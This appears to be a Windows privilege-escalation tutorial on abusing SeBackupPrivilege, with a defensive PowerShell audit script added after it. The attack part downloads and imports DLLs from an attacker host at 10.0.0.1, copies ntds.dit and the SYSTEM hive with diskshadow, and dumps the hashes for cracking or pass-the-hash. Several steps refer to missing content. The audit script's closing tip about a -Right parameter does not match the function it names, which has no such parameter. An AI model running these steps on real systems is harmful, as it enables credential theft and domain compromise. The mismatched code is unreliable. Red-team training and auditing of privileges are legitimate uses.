
Windows PrivEsc with SeBackupPrivilege

SeBackupPrivilege allows a user to read the contents of any file on the system, regardless of its permissions.

First, check whether the current user has SeBackupPrivilege listed in the privilege information:

whoami /all

If so, we can read arbitrary files on the system, including the administrator's files, the SAM file, the SYSTEM registry hive, etc.

On the local machine, download the two DLLs from here.

# If powershell,
Invoke-WebRequest -Uri http://10.0.0.1:8000/SeBackupPrivilegeUtils.dll -OutFile .\SeBackupPrivilegeUtils.dll
Invoke-WebRequest -Uri http://10.0.0.1:8000/SeBackupPrivilegeCmdLets.dll -OutFile .\SeBackupPrivilegeCmdLets.dll
# If winrm,
upload SeBackupPrivilegeUtils.dll
upload SeBackupPrivilegeCmdLets.dll

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

Set-SeBackupPrivilege
Get-SeBackupPrivilege

Create "diskshadow.txt" on the local machine. It refers to this.

Upload this file to the remote machine.

Then execute diskshadow.exe.

We can then download the two files from here.

Now we have the two files (ntds.dit and system) on the local machine. We can dump the password hashes from them.

After that, crack the hashes or use them for pass-the-hash.
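The whoami check above only tells you about the current user. From the defensive side, the question is which principals on a host hold SeBackupPrivilege at all, since every one of them can read the files described above. The following is an added example, not code from the original page or from the SeBackupPrivilege DLL project: it parses the user-rights export that secedit produces, resolves the holders, and expands local groups such as Backup Operators into their actual members. It assumes it is run in an elevated PowerShell on the host being audited; the sample export lines at the bottom are constructed.

```powershell
# Added defensive example (not from the original page): report who holds
# SeBackupPrivilege on this host. Run in an elevated PowerShell.

function ConvertFrom-UserRightsExport {
    # Parses the "[Privilege Rights]" line that secedit writes, e.g.
    #   SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551
    # and returns one object per holder, resolving SIDs to names where possible.
    param([string[]]$Lines, [string]$Right = 'SeBackupPrivilege')
    $line = $Lines | Where-Object { $_ -match "^$Right\s*=" } | Select-Object -First 1
    if (-not $line) { return @() }
    foreach ($entry in ($line -split '=', 2)[1] -split ',') {
        $id = $entry.Trim().TrimStart('*')
        try { $name = ([Security.Principal.SecurityIdentifier]$id).Translate([Security.Principal.NTAccount]).Value }
        catch { $name = $id }   # plain account name, or an orphaned SID that no longer resolves
        [pscustomobject]@{ Holder = $name; Sid = $id }
    }
}

function Get-SeBackupPrivilegeHolders {
    # Export only the user-rights area to a temp file, parse it, then delete it.
    $cfg = Join-Path $env:TEMP ("rights_{0}.inf" -f [guid]::NewGuid())
    secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null
    try { $holders = ConvertFrom-UserRightsExport (Get-Content $cfg) }
    finally { Remove-Item $cfg -ErrorAction SilentlyContinue }
    foreach ($h in $holders) {
        # Expand local groups so the report shows real principals, not just "Backup Operators".
        $group = ($h.Holder -split '\\')[-1]
        $members = Get-LocalGroupMember -Group $group -ErrorAction SilentlyContinue
        if ($members) {
            foreach ($m in $members) {
                [pscustomobject]@{ Via = $group; Principal = $m.Name; Type = $m.ObjectClass }
            }
        } else {
            # Not a local group (a direct user assignment or a domain principal).
            [pscustomobject]@{ Via = '(direct)'; Principal = $h.Holder; Type = 'Account' }
        }
    }
}

# Constructed sample of a secedit export (not a real file) to exercise the parser.
# On an English system these SIDs resolve to BUILTIN\Administrators and BUILTIN\Backup Operators.
$sample = @('[Privilege Rights]', 'SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551')
ConvertFrom-UserRightsExport $sample | Format-Table -AutoSize

# Live audit of this host: anyone listed here beyond the expected admins and backup accounts
# is a candidate for removal from the right or from the group that carries it.
Get-SeBackupPrivilegeHolders | Format-Table -AutoSize
```

Any principal in the output that is not an administrator or a dedicated backup account is worth reviewing, and the same approach applies to SeRestorePrivilege by passing `-Right SeRestorePrivilege`.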
